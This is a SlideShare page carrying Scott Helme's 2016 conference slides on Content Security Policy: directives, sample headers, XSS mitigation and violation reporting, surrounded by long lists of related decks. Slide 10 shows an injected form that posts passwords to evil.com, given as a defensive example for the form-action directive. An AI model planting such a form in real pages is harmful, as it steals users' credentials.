Enviar pesquisa
Carregar
Content Security Policy - The application security Swiss Army Knife
•
Transferir como PPTX, PDF
•
0 gostou
•
819 visualizações
S
Scott Helme
Seguir
My slides from dotSecurity 2016 on Content Security Policy.
Leia menos
Leia mais
Tecnologia
Denunciar
Compartilhar
Denunciar
Compartilhar
1 de 16
Baixar agora
Recomendados
D3LDN17 - Recruiting the Browser
D3LDN17 - Recruiting the Browser
Imperva Incapsula
Content Security Policy
Content Security Policy
Ryan LaBouve
W3C Content Security Policy
W3C Content Security Policy
Markus Wichmann
Preventing XSS with Content Security Policy
Preventing XSS with Content Security Policy
Ksenia Peguero
Securing Java EE Web Apps
Securing Java EE Web Apps
Frank Kim
Content Security Policy
Content Security Policy
Austin Gil
HTTP Security Headers
HTTP Security Headers
Ismael Goncalves
Bünyamin Demir - Secure YourApp
Bünyamin Demir - Secure YourApp
CypSec - Siber Güvenlik Konferansı
Recomendados
D3LDN17 - Recruiting the Browser
D3LDN17 - Recruiting the Browser
Imperva Incapsula
Content Security Policy
Content Security Policy
Ryan LaBouve
W3C Content Security Policy
W3C Content Security Policy
Markus Wichmann
Preventing XSS with Content Security Policy
Preventing XSS with Content Security Policy
Ksenia Peguero
Securing Java EE Web Apps
Securing Java EE Web Apps
Frank Kim
Content Security Policy
Content Security Policy
Austin Gil
HTTP Security Headers
HTTP Security Headers
Ismael Goncalves
Bünyamin Demir - Secure YourApp
Bünyamin Demir - Secure YourApp
CypSec - Siber Güvenlik Konferansı
Integrity protection for third-party JavaScript
Integrity protection for third-party JavaScript
Francois Marier
Http security response headers
Http security response headers
mohammadhosseinrouha
VolgaCTF 2018 - Neatly bypassing CSP
VolgaCTF 2018 - Neatly bypassing CSP
Дмитрий Бумов
Content Security Policy (CSP)
Content Security Policy (CSP)
Arun Kumar
JavaOne India 2011 - Running your Java EE 6 Apps in the Cloud
JavaOne India 2011 - Running your Java EE 6 Apps in the Cloud
Arun Gupta
Integrity protection for third-party JavaScript
Integrity protection for third-party JavaScript
Francois Marier
Using PBWiki in Classrooms
Using PBWiki in Classrooms
niedermeierj
Web Security - CSP & Web Cryptography
Web Security - CSP & Web Cryptography
Samsung Open Source Group
Defeating Cross-Site Scripting with Content Security Policy (updated)
Defeating Cross-Site Scripting with Content Security Policy (updated)
Francois Marier
Bünyamin Demir - 10 Adımda Yazılım Güvenliği
Bünyamin Demir - 10 Adımda Yazılım Güvenliği
CypSec - Siber Güvenlik Konferansı
Use Angular Schematics to Simplify Your Life - Develop Denver 2019
Use Angular Schematics to Simplify Your Life - Develop Denver 2019
Matt Raible
Web Uygulama Güvenliği (Akademik Bilişim 2016)
Web Uygulama Güvenliği (Akademik Bilişim 2016)
Ömer Çıtak
An Overview of Common Vulnerabilities in Wordpress
An Overview of Common Vulnerabilities in Wordpress
Analytive
Lets exploit Injection and XSS
Lets exploit Injection and XSS
lethalduck
Security and Privacy on the Web in 2015
Security and Privacy on the Web in 2015
Francois Marier
Security and Privacy on the Web in 2016
Security and Privacy on the Web in 2016
Francois Marier
10 Excellent Ways to Secure Your Spring Boot Application - The Secure Develop...
10 Excellent Ways to Secure Your Spring Boot Application - The Secure Develop...
Matt Raible
Scaling WordPress #wpldn Jan 2012
Scaling WordPress #wpldn Jan 2012
Peter Westwood
Webpack | Jakub Kulhan - Skrz.cz
Webpack | Jakub Kulhan - Skrz.cz
skrzczdev
Javascript issues and tools in production for developers
Javascript issues and tools in production for developers
Michael Haberman
Building Scalable Systems: What you can learn from Erlang - DotScale 2016
Building Scalable Systems: What you can learn from Erlang - DotScale 2016
Mickaël Rémond
dotJS 2015
dotJS 2015
Brendan Eich
Mais conteúdo relacionado
Mais procurados
Integrity protection for third-party JavaScript
Integrity protection for third-party JavaScript
Francois Marier
Http security response headers
Http security response headers
mohammadhosseinrouha
VolgaCTF 2018 - Neatly bypassing CSP
VolgaCTF 2018 - Neatly bypassing CSP
Дмитрий Бумов
Content Security Policy (CSP)
Content Security Policy (CSP)
Arun Kumar
JavaOne India 2011 - Running your Java EE 6 Apps in the Cloud
JavaOne India 2011 - Running your Java EE 6 Apps in the Cloud
Arun Gupta
Integrity protection for third-party JavaScript
Integrity protection for third-party JavaScript
Francois Marier
Using PBWiki in Classrooms
Using PBWiki in Classrooms
niedermeierj
Web Security - CSP & Web Cryptography
Web Security - CSP & Web Cryptography
Samsung Open Source Group
Defeating Cross-Site Scripting with Content Security Policy (updated)
Defeating Cross-Site Scripting with Content Security Policy (updated)
Francois Marier
Bünyamin Demir - 10 Adımda Yazılım Güvenliği
Bünyamin Demir - 10 Adımda Yazılım Güvenliği
CypSec - Siber Güvenlik Konferansı
Use Angular Schematics to Simplify Your Life - Develop Denver 2019
Use Angular Schematics to Simplify Your Life - Develop Denver 2019
Matt Raible
Web Uygulama Güvenliği (Akademik Bilişim 2016)
Web Uygulama Güvenliği (Akademik Bilişim 2016)
Ömer Çıtak
An Overview of Common Vulnerabilities in Wordpress
An Overview of Common Vulnerabilities in Wordpress
Analytive
Lets exploit Injection and XSS
Lets exploit Injection and XSS
lethalduck
Security and Privacy on the Web in 2015
Security and Privacy on the Web in 2015
Francois Marier
Security and Privacy on the Web in 2016
Security and Privacy on the Web in 2016
Francois Marier
10 Excellent Ways to Secure Your Spring Boot Application - The Secure Develop...
10 Excellent Ways to Secure Your Spring Boot Application - The Secure Develop...
Matt Raible
Scaling WordPress #wpldn Jan 2012
Scaling WordPress #wpldn Jan 2012
Peter Westwood
Webpack | Jakub Kulhan - Skrz.cz
Webpack | Jakub Kulhan - Skrz.cz
skrzczdev
Javascript issues and tools in production for developers
Javascript issues and tools in production for developers
Michael Haberman
Mais procurados
(20)
Integrity protection for third-party JavaScript
Integrity protection for third-party JavaScript
Http security response headers
Http security response headers
VolgaCTF 2018 - Neatly bypassing CSP
VolgaCTF 2018 - Neatly bypassing CSP
Content Security Policy (CSP)
Content Security Policy (CSP)
JavaOne India 2011 - Running your Java EE 6 Apps in the Cloud
JavaOne India 2011 - Running your Java EE 6 Apps in the Cloud
Integrity protection for third-party JavaScript
Integrity protection for third-party JavaScript
Using PBWiki in Classrooms
Using PBWiki in Classrooms
Web Security - CSP & Web Cryptography
Web Security - CSP & Web Cryptography
Defeating Cross-Site Scripting with Content Security Policy (updated)
Defeating Cross-Site Scripting with Content Security Policy (updated)
Bünyamin Demir - 10 Adımda Yazılım Güvenliği
Bünyamin Demir - 10 Adımda Yazılım Güvenliği
Use Angular Schematics to Simplify Your Life - Develop Denver 2019
Use Angular Schematics to Simplify Your Life - Develop Denver 2019
Web Uygulama Güvenliği (Akademik Bilişim 2016)
Web Uygulama Güvenliği (Akademik Bilişim 2016)
An Overview of Common Vulnerabilities in Wordpress
An Overview of Common Vulnerabilities in Wordpress
Lets exploit Injection and XSS
Lets exploit Injection and XSS
Security and Privacy on the Web in 2015
Security and Privacy on the Web in 2015
Security and Privacy on the Web in 2016
Security and Privacy on the Web in 2016
10 Excellent Ways to Secure Your Spring Boot Application - The Secure Develop...
10 Excellent Ways to Secure Your Spring Boot Application - The Secure Develop...
Scaling WordPress #wpldn Jan 2012
Scaling WordPress #wpldn Jan 2012
Webpack | Jakub Kulhan - Skrz.cz
Webpack | Jakub Kulhan - Skrz.cz
Javascript issues and tools in production for developers
Javascript issues and tools in production for developers
Destaque
Building Scalable Systems: What you can learn from Erlang - DotScale 2016
Building Scalable Systems: What you can learn from Erlang - DotScale 2016
Mickaël Rémond
dotJS 2015
dotJS 2015
Brendan Eich
Secure Software Distribution in an Adversarial World
Secure Software Distribution in an Adversarial World
Diogo Mónica
3 Fierce Strategies to Thrive in Times of Change
3 Fierce Strategies to Thrive in Times of Change
Fierce Inc
Pedaços de você
Pedaços de você
Luzia Gabriele
Planificacion de los colours
Planificacion de los colours
Belle Ramos
Seminário 3 - Por uma prática docente crítica e construtiva
Seminário 3 - Por uma prática docente crítica e construtiva
Cosmo Matias Gomes
Space Apps Tokyo 2016 Input Day
Space Apps Tokyo 2016 Input Day
Chie Mizuta
Banana and cinnamon french toast recipe
Banana and cinnamon french toast recipe
Agnes Yodo
It Takes an Ecosystem – How Brightspace and our partners are making education...
It Takes an Ecosystem – How Brightspace and our partners are making education...
D2L
Indonesia by Photographer David Lazar
Indonesia by Photographer David Lazar
maditabalnco
3 Tips to Build an Accountable Culture
3 Tips to Build an Accountable Culture
Fierce Inc
H28 08-27 産学連携学会 第4回研究会(1h)
H28 08-27 産学連携学会 第4回研究会(1h)
Masao Mori
Mobile World Congress Keynote Speaker: Mark Zuckerberg
Mobile World Congress Keynote Speaker: Mark Zuckerberg
Ogilvy
Jotbar mobiilileimaus
Jotbar mobiilileimaus
Jotbar
Destaque
(15)
Building Scalable Systems: What you can learn from Erlang - DotScale 2016
Building Scalable Systems: What you can learn from Erlang - DotScale 2016
dotJS 2015
dotJS 2015
Secure Software Distribution in an Adversarial World
Secure Software Distribution in an Adversarial World
3 Fierce Strategies to Thrive in Times of Change
3 Fierce Strategies to Thrive in Times of Change
Pedaços de você
Pedaços de você
Planificacion de los colours
Planificacion de los colours
Seminário 3 - Por uma prática docente crítica e construtiva
Seminário 3 - Por uma prática docente crítica e construtiva
Space Apps Tokyo 2016 Input Day
Space Apps Tokyo 2016 Input Day
Banana and cinnamon french toast recipe
Banana and cinnamon french toast recipe
It Takes an Ecosystem – How Brightspace and our partners are making education...
It Takes an Ecosystem – How Brightspace and our partners are making education...
Indonesia by Photographer David Lazar
Indonesia by Photographer David Lazar
3 Tips to Build an Accountable Culture
3 Tips to Build an Accountable Culture
H28 08-27 産学連携学会 第4回研究会(1h)
H28 08-27 産学連携学会 第4回研究会(1h)
Mobile World Congress Keynote Speaker: Mark Zuckerberg
Mobile World Congress Keynote Speaker: Mark Zuckerberg
Jotbar mobiilileimaus
Jotbar mobiilileimaus
Semelhante a Content Security Policy - The application security Swiss Army Knife
Content Security Policies: A whole new way of securing your website that no o...
Content Security Policies: A whole new way of securing your website that no o...
Miriam Schwab
Content Security Policies: A whole new way of securing your website that no o...
Content Security Policies: A whole new way of securing your website that no o...
Miriam Schwab
HTTP_Header_Security.pdf
HTTP_Header_Security.pdf
ksudhakarreddy5
Rails security: above and beyond the defaults
Rails security: above and beyond the defaults
Matias Korhonen
CONFidence 2018: Defense-in-depth techniques for modern web applications and ...
CONFidence 2018: Defense-in-depth techniques for modern web applications and ...
PROIDEA
Web App Security for Java Developers - PWX 2021
Web App Security for Java Developers - PWX 2021
Matt Raible
Content-Security-Policy 2018.0
Content-Security-Policy 2018.0
Philippe Gamache
The Need for Speed (5 Performance Optimization Tipps) - brightonSEO 2014
The Need for Speed (5 Performance Optimization Tipps) - brightonSEO 2014
Bastian Grimm
Csp and http headers
Csp and http headers
ColdFusionConference
Csp and http headers
Csp and http headers
devObjective
Web App Security for Java Developers - UberConf 2021
Web App Security for Java Developers - UberConf 2021
Matt Raible
21 05-2018
21 05-2018
Praaveen Vr
Progressive downloads and rendering (Stoyan Stefanov)
Progressive downloads and rendering (Stoyan Stefanov)
Ontico
Cabeçalhos de Segurança HTTP
Cabeçalhos de Segurança HTTP
Ismael Goncalves
001
001
bwtvcf
Web content security policies
Web content security policies
Dhanu Gupta
Progressive Downloads and Rendering
Progressive Downloads and Rendering
Stoyan Stefanov
Ignite content security policy
Ignite content security policy
jstack
The Need for Speed - SMX Sydney 2013
The Need for Speed - SMX Sydney 2013
Bastian Grimm
Breaking Bad CSP
Breaking Bad CSP
Lukas Weichselbaum
Semelhante a Content Security Policy - The application security Swiss Army Knife
(20)
Content Security Policies: A whole new way of securing your website that no o...
Content Security Policies: A whole new way of securing your website that no o...
Content Security Policies: A whole new way of securing your website that no o...
Content Security Policies: A whole new way of securing your website that no o...
HTTP_Header_Security.pdf
HTTP_Header_Security.pdf
Rails security: above and beyond the defaults
Rails security: above and beyond the defaults
CONFidence 2018: Defense-in-depth techniques for modern web applications and ...
CONFidence 2018: Defense-in-depth techniques for modern web applications and ...
Web App Security for Java Developers - PWX 2021
Web App Security for Java Developers - PWX 2021
Content-Security-Policy 2018.0
Content-Security-Policy 2018.0
The Need for Speed (5 Performance Optimization Tipps) - brightonSEO 2014
The Need for Speed (5 Performance Optimization Tipps) - brightonSEO 2014
Csp and http headers
Csp and http headers
Csp and http headers
Csp and http headers
Web App Security for Java Developers - UberConf 2021
Web App Security for Java Developers - UberConf 2021
21 05-2018
21 05-2018
Progressive downloads and rendering (Stoyan Stefanov)
Progressive downloads and rendering (Stoyan Stefanov)
Cabeçalhos de Segurança HTTP
Cabeçalhos de Segurança HTTP
001
001
Web content security policies
Web content security policies
Progressive Downloads and Rendering
Progressive Downloads and Rendering
Ignite content security policy
Ignite content security policy
The Need for Speed - SMX Sydney 2013
The Need for Speed - SMX Sydney 2013
Breaking Bad CSP
Breaking Bad CSP
Último
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
apidays
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
MIND CTI
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challenges
rafiqahmad00786416
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
The Digital Insurer
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
apidays
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Juan lago vázquez
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
danishmna97
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Orbitshub
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
Product Anonymous
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
apidays
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
Zilliz
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
MadyBayot
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
Nanddeep Nachan
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
sammart93
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
apidays
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontology
johnbeverley2021
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Angeliki Cooney
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
ThousandEyes
Último
(20)
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challenges
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontology
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
Content Security Policy - The application security Swiss Army Knife
1.
Content Security Policy The
application security Swiss Army Knife @Scott_Helme | scotthelme.co.uk Scott Helme
2.
Browser support
3.
What is CSP? cache-control:
max-age=0, no-cache content-encoding: gzip content-security-policy: [policy goes here] date: Fri, 22 Apr 2016 10:00:00 GMT server: nginx status: 200
4.
child-src connect-src default-src font-src frame-src* CSP Directives img-src media-src object-src script-src style-src * deprecated
5.
A basic policy Content-Security-Policy:
default-src ‘self’ mycdn.com
6.
Fine tuning Content-Security-Policy: default-src
‘self’; script-src ‘self’ cdnjs.cloudflare.com ajax.googleapis.com <script src="https://ajax.googleapis.com/.../jquery.min.js"> </script> <script src="https://cdnjs.cloudflare.com/.../bootstrap.min.js"> </script>
7.
Fine tuning Content-Security-Policy: default-src
‘self’; script-src [source list]; style-src [source list]; img-src [source list]; child-src [source list];
8.
Mitigating XSS <script> var message
= “Hello World!!!”; alert(message); </script> <script src=“(scotthelme.co.uk)/js/message.js”> </script>
9.
form-action frame- ancestors Additional CSP Directives block-all-mixed-content upgrade-insecure- requests
10.
form-action frame- ancestors Additional CSP Directives block-all-mixed-content upgrade-insecure- requests <form
action=“https://evil.com/stealPassword.php” method=“post”> ... </form>
11.
form-action frame- ancestors Additional CSP Directives block-all-mixed-content upgrade-insecure- requests <iframe
src=“https://scotthelme.co.uk/”> </iframe>
12.
form-action frame- ancestors Additional CSP Directives block-all-mixed-content upgrade-insecure- requests <img
src=“http://imgur.com/kittens.png/”>
13.
Testing CSP Content-Security-Policy-Report-Only: [policy]
14.
CSP Reporting Content-Security-Policy-Report-Only: [policy]; report-uri
https://scotthelme.report-uri.io { "csp-report": { "document-uri": "https://scotthelme.co.uk/ecdsa/", "violated-directive": “script-src ‘self’", "original-policy": “[policy here]", "blocked-uri": https://evil.com ...
15.
Migrating from HTTP
to HTTPS Content-Security-Policy-Report-Only: default-src https:; report-uri https://scotthelme.report-uri.io
16.
Thanks! @Scott_Helme | scotthelme.co.uk Scott
Helme
Baixar agora